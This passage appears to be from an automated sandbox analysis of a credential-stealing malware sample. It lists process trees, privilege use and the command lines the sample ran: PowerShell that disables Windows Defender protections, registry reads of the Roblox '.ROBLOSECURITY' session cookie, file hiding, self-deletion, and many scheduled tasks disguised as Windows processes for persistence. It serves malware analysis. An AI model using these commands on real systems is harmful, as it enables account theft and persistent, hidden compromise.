N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\MsWinsessiondllNet\driverBrokercommon.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A
N/A N/A C:\Users\All Users\OfficeClickToRun.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3572 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 3572 wrote to memory of 2088 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\stealer.exe
PID 3572 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 3572 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 3572 wrote to memory of 2876 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\чекер dc.exe
PID 3572 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 3572 wrote to memory of 4460 N/A C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe C:\Users\Admin\AppData\Local\Temp\Inject.exe
PID 2088 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2088 wrote to memory of 1212 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2876 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2876 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2876 wrote to memory of 4128 N/A C:\Users\Admin\AppData\Local\Temp\чекер dc.exe C:\Windows\SysWOW64\WScript.exe
PID 2088 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\attrib.exe
PID 2088 wrote to memory of 4556 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\attrib.exe
PID 2088 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 952 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\system32\schtasks.exe
PID 2088 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\system32\schtasks.exe
PID 2088 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2088 wrote to memory of 3844 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2088 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\system32\schtasks.exe
PID 2088 wrote to memory of 3856 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\system32\schtasks.exe
PID 2088 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2088 wrote to memory of 2012 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2088 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 1772 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2088 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 2088 wrote to memory of 3676 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\System32\Wbem\wmic.exe
PID 4128 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4128 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 4128 wrote to memory of 1072 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1072 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 1072 wrote to memory of 3532 N/A C:\Windows\SysWOW64\cmd.exe C:\MsWinsessiondllNet\driverBrokercommon.exe
PID 2088 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\cmd.exe
PID 2088 wrote to memory of 3680 N/A C:\Users\Admin\AppData\Local\Temp\stealer.exe C:\Windows\SYSTEM32\cmd.exe
PID 3680 wrote to memory of 3916 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 3680 wrote to memory of 3916 N/A C:\Windows\SYSTEM32\cmd.exe C:\Windows\system32\PING.EXE
PID 3532 wrote to memory of 5028 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 3532 wrote to memory of 5028 N/A C:\MsWinsessiondllNet\driverBrokercommon.exe C:\Windows\System32\cmd.exe
PID 1072 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1072 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 1072 wrote to memory of 5064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5028 wrote to memory of 3444 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 5028 wrote to memory of 3444 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\w32tm.exe
PID 5028 wrote to memory of 4940 N/A C:\Windows\System32\cmd.exe C:\Users\All Users\OfficeClickToRun.exe
PID 5028 wrote to memory of 4940 N/A C:\Windows\System32\cmd.exe C:\Users\All Users\OfficeClickToRun.exe
PID 4940 wrote to memory of 1496 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 4940 wrote to memory of 1496 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 4940 wrote to memory of 4132 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 4940 wrote to memory of 4132 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 1496 wrote to memory of 1684 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\OfficeClickToRun.exe
PID 1496 wrote to memory of 1684 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\OfficeClickToRun.exe
PID 1684 wrote to memory of 3968 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 1684 wrote to memory of 3968 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 1684 wrote to memory of 2380 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 1684 wrote to memory of 2380 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 3968 wrote to memory of 1156 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\OfficeClickToRun.exe
PID 3968 wrote to memory of 1156 N/A C:\Windows\System32\WScript.exe C:\Users\All Users\OfficeClickToRun.exe
PID 1156 wrote to memory of 4372 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe
PID 1156 wrote to memory of 4372 N/A C:\Users\All Users\OfficeClickToRun.exe C:\Windows\System32\WScript.exe

Uses Task Scheduler COM API

persistence

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe

"C:\Users\Admin\AppData\Local\Temp\a377c1c13801481e8dcc3c8a30c3df070ad73b9983e8c4fe85c058ac9034ee37.exe"

C:\Users\Admin\AppData\Local\Temp\stealer.exe

"C:\Users\Admin\AppData\Local\Temp\stealer.exe"

C:\Users\Admin\AppData\Local\Temp\чекер dc.exe

"C:\Users\Admin\AppData\Local\Temp\чекер dc.exe"

C:\Users\Admin\AppData\Local\Temp\Inject.exe

"C:\Users\Admin\AppData\Local\Temp\Inject.exe"

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\MsWinsessiondllNet\zHYxYvywzA0UOqnH8B4aBgoRvO2C5.vbe"

C:\Windows\SYSTEM32\attrib.exe

"attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\stealer.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\stealer.exe'

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" os get Caption

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" computersystem get totalphysicalmemory

C:\Windows\System32\Wbem\wmic.exe

"wmic.exe" csproduct get uuid

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\System32\Wbem\wmic.exe

"wmic" path win32_VideoController get name

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\MsWinsessiondllNet\q6hjn2OvCg2VETYAoy3FIOj.bat" "

C:\MsWinsessiondllNet\driverBrokercommon.exe

"C:\MsWinsessiondllNet\driverBrokercommon.exe"

C:\Windows\SYSTEM32\cmd.exe

"cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\stealer.exe" && pause

C:\Windows\system32\PING.EXE

ping localhost

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\MsWinsessiondllNet\conhost.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 6 /tr "'C:\Users\Default\SendTo\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 14 /tr "'C:\Recovery\WindowsRE\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 14 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 12 /tr "'C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 5 /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 8 /tr "'C:\Program Files\Internet Explorer\en-US\spoolsv.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 11 /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Windows Multimedia Platform\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 8 /tr "'C:\Windows\Speech_OneCore\Engines\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "dwmd" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Common Files\dwm.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 7 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\MsWinsessiondllNet\csrss.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 8 /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 9 /tr "'C:\Windows\Migration\WTR\SppExtComObj.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 14 /tr "'C:\Windows\INF\winlogon.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\INF\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 12 /tr "'C:\Windows\INF\winlogon.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 12 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\OfficeClickToRun.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 12 /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\MsWinsessiondllNet\RuntimeBroker.exe'" /rl HIGHEST /f

C:\Windows\system32\schtasks.exe

schtasks.exe /create /tn "smsss" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\Windows Photo Viewer\uk-UA\smss.exe'" /f

C:\Windows\system32\schtasks.exe

